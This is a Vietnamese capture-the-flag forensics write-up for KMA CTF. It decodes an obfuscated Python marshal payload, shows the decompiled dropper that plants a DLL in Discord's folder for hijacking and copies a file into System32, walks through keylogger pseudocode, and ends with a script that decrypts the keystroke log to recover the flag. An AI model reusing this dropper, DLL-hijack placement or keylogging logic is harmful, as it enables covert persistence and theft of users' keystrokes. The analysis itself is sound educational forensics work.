ZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZHlkFWQZZIpkgmQVZBNk/GR7ZBlkFWQAZGxkE2QUZBNke2QVZBFkLWRfZBRkFWQZZLtkEWQVZGBkEmQVZBlkzWRVZBVkE2Q5ZLtkGWQVZP9kFGQTZBRkoGRsZBVkEWQoZKNkFGQVZO1kFGQRZBVkNWR/ZBVkGWTUZK9kFWQTZHlkfGQZZBVkRGR7ZBNkFGRsZLZkFWQRZA5kImQUZBVkemTFZBFkFWRgZHRkFWQZZNpkh2QVZBNkcGTFZBlkFWSpZHxkE2QUZE5kMmQVZBFk5ZABZABkFGQVZMlkwWQRZBVke2TEZBVkGWTdZBlkFWQTZCpkwWQZZBVkLmTRZBNkFGQtZBFkFWQRZFpk1GQUZBVk62TRZBFkFWTIZH9kFWQZZLRkIWQVZBNkv2TRZBlkFWTOZHtkE2QUZG1k6GQVZBFk6mTYZBRkFWTKZHtkEWQVZIpkpWQVZBlkW2TxZBVkE2TVZHtkGWQVZE5k3mQTZBRkiGTqZBVkEWTNZF9kFGQVZE5k3mQRZBVk5GSlZBVkGWTNZFVkFWQTZJRk3mQZZBVkzGTeZBNkFGSeZBFkFWQRZNRk2GQUZBVkYWTpZBFkFWTIZH9kFWQZZOlkxGQVZBNkn2TpZBlkFWTOZHtkE2QUZOVkYWQVZBFkdmRQZBRkFWTKZHtkEWQVZLdkRWQVZBlkRGTEZBVkE2RwZMVkGWQVZL9k6WQTZBRkb2SfZBVkEZABZAqQAWQAZBRkFWS5ZHhkEWQVZHFkh2QVZBlkk2QZZBVkE5ABZAFkeGQZZBWQAWQAZHhkE2QUZJNkEWQVZBFko2SWZBRkFWR+ZPtkEWQVZDVk/GQVZBlk3WSBZBVkE2QrZPtkGWQVZEdkxWQTZBRkiGSOZBVkEWTCZKtkFGQVZOBkxWQRZBVkcWQhZBVkGWRCZBdkFWQTZJFkxWQZZBVkymSqZBNkFGTiZL5kFWQRZM1kX2QUZBVk7mSqZBFkFWRRZK9kFWQZZL1kGWQVZBNkK2QRZBlkFWQvZBFkE2QUZLRkEWQVZBFkEGT3ZBRkFWTfZBFkEWQVZLBk/GQVZBlkt2QVZBVkE2RHZBFkGWQVZKxke2QTZBRkQGTFZBVkEZABZABk92QUZBVkU2R7ZBFkFWTFZK9kFWQZZIZkFWQVZBNklGR7ZBlkFWRPZBFkE2QUZGxkxGQVZBFkfJABZABkFGQVZHtkOmQRZBVkXWQyZBVkGWSLZBlkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkfmQVZGFkFWQRZBVkUGQUZBVkJGQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkF2QRZHlkE2QUZBVk3mQVZBFkgGQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkAGQUZCFkFmQVZBFkLWQTZBRkFWRUZIVkEWQVZDdkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWSOZEpk1mQvZJ1kOmQ8ZJxkb2QwZDxkLWQ1ZHdkGWTtZI5k6mQVZDpkQmQ1ZP5kD2RBZHFkNWSMZMtk7GRUkAFkCmQwZHVkGWQZZCpkMGSLZDRkNWTkZDBk/WQPZDVkOWTLZMVk/2SpZDBkGWTpZJ9kFGRFZPlkJ2QnkAFkCmScZCxkK2T9ZJBkOmQbZC9kJ2Q1ZFxkpmQZZHBkLGQ2ZPNkXGQ2ZChkOWQvZH1kJ2RmZMlkPGRuZCxkiGQnZGNki2SLZEVkM2SIZC9kp2QnZCeQAWQGZENkPGToZOxkMmQvZDRkNWQpZHZkqWQwZItkNmScZC9kJ2SsZA9kNWTIZBlkQ2RDZIpk72SfZPxkRWQWZKZkl2QwZCdkOWQvZA9k8mTgZOVkr2R1ZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWTeZBVkEWTlZBNkFGQVZCaQAWQIZBFkc2TVZGRkbGTPZOlkkWRVZBtk1mRzZCRkc2QZkAFkAWRgkAFkAmTDZNdkiWSzZBxkvGQUZNlkpmTZZIJk2WRQZN9kFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQTZBRkFWQZZBVkEWQVZBNkFGQVZBlkFWQRZBVkE2QUZBVkGWQVZBFkFWQT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JwAAAOnqAAAA6VMAAADppwAAAOn4AAAA6ccAAADpDQAAAOkFAAAA6eUAAADpgAAAAOk8AAAA6cIAAADpCAAAAOkbAAAA6QQAAADpeQAAAOk0AAAA6ekAAADpYwAAAOkcAAAA6RcAAADpCQAAAOmVAAAA6XoAAADpFgAAAOlcAAAA6XsAAADpdwAAAOk1AAAA6csAAADp6AAAAOlOAAAA6XgAAADpagAAAOkGAAAA6fMAAADphAAAAOnTAAAA6RAAAADp4wAAAOnOAAAA6ecAAADpzwAAAOlnAAAA6SYAAADpMAAAAOkkAAAA6coAAADpCwAAAOn3AAAA6ZMAAADpxQAAAOkCAAAA6X4AAADpLgAAAOkeAAAA6QoAAADpPQAAAOkqAAAA6eQAAADp1QAAAOltAAAA6WIAAADphgAAAOk5AAAA6V0AAADpTwAAAOmiAAAA6a4AAADppgAAAOm1AAAA6SIAAADpXwAAAOlwAAAA6asAAADpQwAAAOlKAAAAYwEAAAAAAAAAAgAAAAkAAABDAAAAcy4AAABnAHwAXSZ9AXQAoAF0AnwBGQB0A3wBdAR0A4MBFgAZAEEAZABkAaEDkQJxBFMAKQJyBAAAAHIFAAAAKQVyBgAAAHIHAAAA2gJrNNoCazVyCgAAACkCcgsAAAByDAAAAHINAAAAcg0AAAByDgAAAHIPAAAAEQAAAHMCAAAABgDaC1VTRVJQUk9GSUxFegNcQXDaAXBaA2RhdHoEYVxMb1oDY2FsegJcRNoCaXNaA2NvctoBZGMBAAAAAAAAAAIAAAAEAAAAQwAAAHMaAAAAZwB8AF0SfQF8AaAAoQByBHwBagGRAnEEUwByDQAAACkC2gZpc19kaXLaBHBhdGgpAnILAAAA2gFmcg0AAAByDQAAAHIOAAAAcg8AAAAYAAAAcwIAAAAGAFoDYXBwegVtb3ZlIPoBIHoUIEM6XFdpbmRvd3NcU3lzdGVtMzIpGtoCb3PaBmJhc2U2NNoEb3BlbnIaAQAA2gRyZWFkcggAAADaCWI2NGRlY29kZXIJAAAAWgJrMtoEam9pbtoFcmFuZ2VyCgAAAFoFZGF0YTLaAW7aBXdyaXRlWgJrM3ISAQAAchMBAABaAmQy2gZnZXRlbnZaAmZs2gRleGl02gdzY2FuZGlyWgNzZmxyDAAAANoGc3lzdGVtcg0AAAByDQAAAHINAAAAcg4AAADaCDxtb2R1bGU+AgAAAHPkAAAACAEIAQwBEgEKAQoCHAEUAQwBFAEEAQ4B/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AP8A/wD/AB0BEgEeAQwBFAECAUYBBgEOARYBCgEMASAB'
import base64
import marshal
exec(marshal.loads(base64.b64decode(z)))
Đoạn mã này decode đoạn base64 trong biến z và chuyển đổi từ dạng nhị phân sang Python code object sau đó thực thi.
Vì đây là dạng python code object nên ta sẽ có 2 sự lựa chọn để đọc mã nguồn của nó, 1 là đọc byte code bằng thư viện dis của python, 2 là chuyển nó về dạng pyc sau đó dùng PyLingual để decompile (Mình chọn cách thứ 2)
Thêm 16 byte đầu cho đúng header, có thể dùng file pyc gốc để so sánh
1
2
3
┌──(kali㉿kali)-[~/Downloads/KMA CTF/forever]
└─$ file download.dat2.pyc
download.dat2.pyc: Byte-compiled Python module for CPython 3.7, timestamp-based, .py timestamp: Thu Jan 1 00:00:00 1970 UTC, .py size: 2883584 bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import os
import base64
with open('config.sys', 'rb') as f:
data = f.read()
k1 = base64.b64decode('/yD2eJUB/oY=')
k2 = base64.b64decode('2trmXMrwyg==')
data2 = b''.join([int.to_bytes(data[i] ^ k1[i % len(k1)], 1, 'big') for i in range(len(data))])
n = ''.join([chr(i >> 1) for i in k2])
with open(n, 'wb') as f:
f.write(data2)
k3 = 'lld.21d3d'
k3 = k3[::-1]
'Decompiler error: line too long for translation. Please decompile this statement manually.'
k5 = [255, 216, 255, 224, 255, 1, 237]
d2 = b''.join([int.to_bytes(k4[i] ^ k5[i % len(k5)], 1, 'big') for i in range(len(k4))])
with open(k3, 'wb') as f:
f.write(d2)
try:
fl = os.getenv('USERPROFILE') + '\\Ap' + 'p' + 'dat' + 'a\\Lo' + 'cal' + '\\D' + 'is' + 'cor' + 'd'
except:
exit(0)
sfl = [f.path for f in os.scandir(fl) if f.is_dir()]
for i in sfl:
if 'app' in i:
os.system(f'move {k3} {i}')
os.system(f'move {n} C:\\Windows\\System32')
Đoạn mã này sử dụng file config.sys sau đó xor với chuỗi base64 ‘/yD2eJUB/oY=’ rồi di chuyển vào C:\Windows\System32
Còn file dll được tạo từ biến k4 được di chuyển vào folder app của discord
1
2
3
4
sfl = [f.path for f in os.scandir(fl) if f.is_dir()]
for i in sfl:
if 'app' in i:
os.system(f'move {k3} {i}')
=> Đây là kĩ thuật DLL Hijacking cho phép file dll độc hại được chạy mỗi khi mở discord lên 
Sau khi xor ta thu được file PE khác
Ta sử dụng IDA để xem mã giả
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
int __fastcall main(int argc, const char **argv, const char **envp)
{
HWND ConsoleWindow; // rax
__int64 v4; // r8
__int64 v5; // rax
int i; // ebx
__int64 v7; // rdx
__int64 v8; // r8
int v9; // eax
_BYTE v11[40]; // [rsp+28h] [rbp-160h] BYREF
_QWORD v12[2]; // [rsp+50h] [rbp-138h] BYREF
_BYTE v13[272]; // [rsp+60h] [rbp-128h] BYREF
ConsoleWindow = GetConsoleWindow();
ShowWindow(ConsoleWindow, 0);
v5 = sub_140002460((__int64)v11, (__int64)"Microft Version Stub_", v4);
sub_140001470(v5);
while ( 1 )
{
Sleep(0xAu);
for ( i = 8; i <= 254; ++i )
{
if ( GetAsyncKeyState(i) == -32767 && !sub_140001550(i, v7, v8) )
{
sub_140001540(v12); // memset
sub_1400023B0(v12);
sub_1400022F0((__int64)v12);
if ( (unsigned __int8)sub_140002340(v12) )
{
v9 = rand();
i ^= v9 % 255;
sub_140002D10((__int64)v13, v9 % 255);
sub_140002D10((__int64)v13, i);
sub_1400022B0((__int64)v12);
}
sub_140001510((__int64)v12);
}
}
}
}
Nhìn tổng quan hàm main, có thể thấy đây là 1 phần của mã độc keylogger bởi vì
- Ẩn cửa sổ console
1
2
ConsoleWindow = GetConsoleWindow();
ShowWindow(ConsoleWindow, 0); // SW_HIDE = 0
- Kiểm tra nếu phím được nhấn xuống (keydown).
1
2
3
4
5
6
while (1)
{
Sleep(0xA); // ngủ 10ms
for (i = 8; i <= 254; ++i) // quét toàn bộ mã phím
{
if (GetAsyncKeyState(i) == -32767 && !sub_140001550(i, v7, v8))
Bây giờ tiến hành phân tích sâu hơn
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
v5 = sub_140002460((__int64)v11, (__int64)"Microft Version Stub_", v4);
__int64 __fastcall sub_140001470(__int64 a1)
__int64 __fastcall sub_1400028D0(__int64 a1)
{
struct _iobuf *v2; // rax
__int64 v3; // rax
__int64 v4; // rax
_BYTE v6[24]; // [rsp+20h] [rbp-18h] BYREF
if ( *(_QWORD *)(a1 + 128) )
return 0LL;
v2 = std::_Fiopen("msstub.dat", 8, 64);
if ( !v2 )
return 0LL;
sub_140002790(a1, v2, 1LL);
v3 = std::streambuf::getloc(a1, v6);
v4 = sub_140002F00(v3);
sub_140002640(a1, v4);
sub_140001360(v6);
return a1;
}
Dòng này chạy hàm sub_140001470 bao gồm hàm sub_1400028D0 cho phép mở file msstub.dat dưới dạng binanry và ghi chuỗi Microft Version Stub_ vào trong
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
char __fastcall sub_140001550(int a1, __int64 a2, __int64 a3)
{
const char *v3; // rdx
__int64 v4; // rax
int v6; // ecx
__int64 v7; // rax
_BYTE v8[32]; // [rsp+20h] [rbp-20h] BYREF
if ( a1 > 189 )
{
v6 = a1 - 219;
if ( v6 )
{
if ( v6 != 2 )
return 0;
v3 = "@CBS";
}
else
{
v3 = "@OBS";
}
LABEL_24:
v7 = sub_140002460((__int64)v8, (__int64)v3, a3);
sub_140001470(v7);
return 1;
}
else
{
if ( a1 != 189 )
{
switch ( a1 )
{
case -66:
v3 = "@DS";
goto LABEL_24;
case 2:
v3 = "@RC";
goto LABEL_24;
case 8:
v3 = "@BS";
goto LABEL_24;
case 9:
v3 = "@TS";
goto LABEL_24;
case 13:
v3 = "@LFS";
goto LABEL_24;
case 16:
v3 = "@SF";
goto LABEL_24;
case 17:
v3 = "@CTS";
goto LABEL_24;
case 18:
v3 = "@ALS";
goto LABEL_24;
case 20:
v3 = "@CS";
goto LABEL_24;
case 32:
v3 = "@SS";
goto LABEL_24;
case 37:
v3 = "@LS";
goto LABEL_24;
case 38:
v3 = "@US";
goto LABEL_24;
case 39:
v3 = "@RS";
goto LABEL_24;
case 40:
v3 = "@DWS";
goto LABEL_24;
default:
return 0;
}
}
v4 = sub_140002460((__int64)v8, (__int64)"@UDS", a3);
sub_140001470(v4);
return 0;
}
Hàm sub_140001550 có chức năng lọc một số mã phím đặc biệt (control keys như: Shift, Ctrl, Alt, phím mũi tên…) và ghi log tương ứng với các phím đó dưới dạng chuỗi đã định danh (ví dụ: “@LS”, “@CS”,…).
Cuối cùng là gọi sub_140001470 để ghi vào file msstub.dat
1
2
3
4
5
v9 = rand();
i ^= v9 % 255;
sub_140002D10((__int64)v13, v9 % 255);
sub_140002D10((__int64)v13, i);
sub_1400022B0((__int64)v12);
Tiếp theo đoạn source bắt đầu mã hóa các phím nhấn dựa trên key xor được tạo ngẫu nhiên từ hàm rand(), sau đó lưu chúng vào v13
Theo như source key và dữ liệu sẽ đi liền kề nhau trong file msstub.dat
Để lấy được file msstub.dat ta cần sử dụng artifact còn lại là file memory dump
Mình sẽ thử test 1 vài byte xem suy đoán có đúng không
Bây giờ tiến hành viết script giải mã
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
mapper = {
b"@SS" : "<SPACE>",
b"@LFS" : "<RETURN>",
b"@SF" : "<SHIFT>",
b"@BS" : "<BACK>",
b"@RC" : "<RBUTTON>",
b"@CS" : "<CAPITAL>",
b"@TS" : "<TAB>",
b"@US" : "<UP>",
b"@DWS" : "<DOWN>",
b"@LS" : "<LEFT>",
b"@RS" : "<RIGHT>",
b"@CTS" : "<CONTROL>",
b"@OBS" : "<Open Bracket>",
b"CBS" : "<Close Bracket>",
b"@UDS" : "<UNDERLINE>"
}
with open("msstub.dat", "rb") as f:
data = f.read()
data = data.replace(b"Microft Version Stub_", b"")
i = 0
while i < len(data):
found = False
for key in mapper:
if data[i:i+len(key)] == key:
print(mapper[key], end='')
i += len(key)
found = True
break
if not found:
if i + 1 < len(data):
key_byte = data[i]
press_byte = data[i+1]
xored = key_byte ^ press_byte
#print(key_byte)
#print(press_byte)
print(chr(xored), end='')
i += 2
else:
print(chr(data[i]), end='')
i += 1
1
NOTEPAD<RETURN><SHIFT> <SHIFT>KMACTF<SHIFT> <Open Bracket><SHIFT> A<SHIFT> <UNDERLINE>½<SHIFT> I<SHIFT> <UNDERLINE>½<SHIFT> <SHIFT> U <SHIFT><UNDERLINE>½E<SHIFT> <UNDERLINE>½OKAH<BACK><BACK>ASHI<UNDERLINE>½SHITA<UNDERLINE>½<SHIFT> K4<SHIFT> K1<SHIFT> <UNDERLINE>½KUU<BACK><BACK><SHIFT> UU<SHIFT> <UNDERLINE>½<SHIFT> KK3<SHIFT> <SHIFT> <SHIFT> <UNDERLINE>½K0<SHIFT> NN4<SHIFT> <UNDERLINE>½N1<SHIFT> <UNDERLINE>½M0<SHIFT> <BACK><BACK><SHIFT> M0<SHIFT> D<BACK><SHIFT> Y<RETURN><CONTROL>¢H<SHIFT> Y
Flag
KMACTF{A_I_U_E_OKASHI_SHITA_K4K1_KUU_KK3_K0NN4_N1_M0}
This post is licensed under CC BY 4.0 by the author.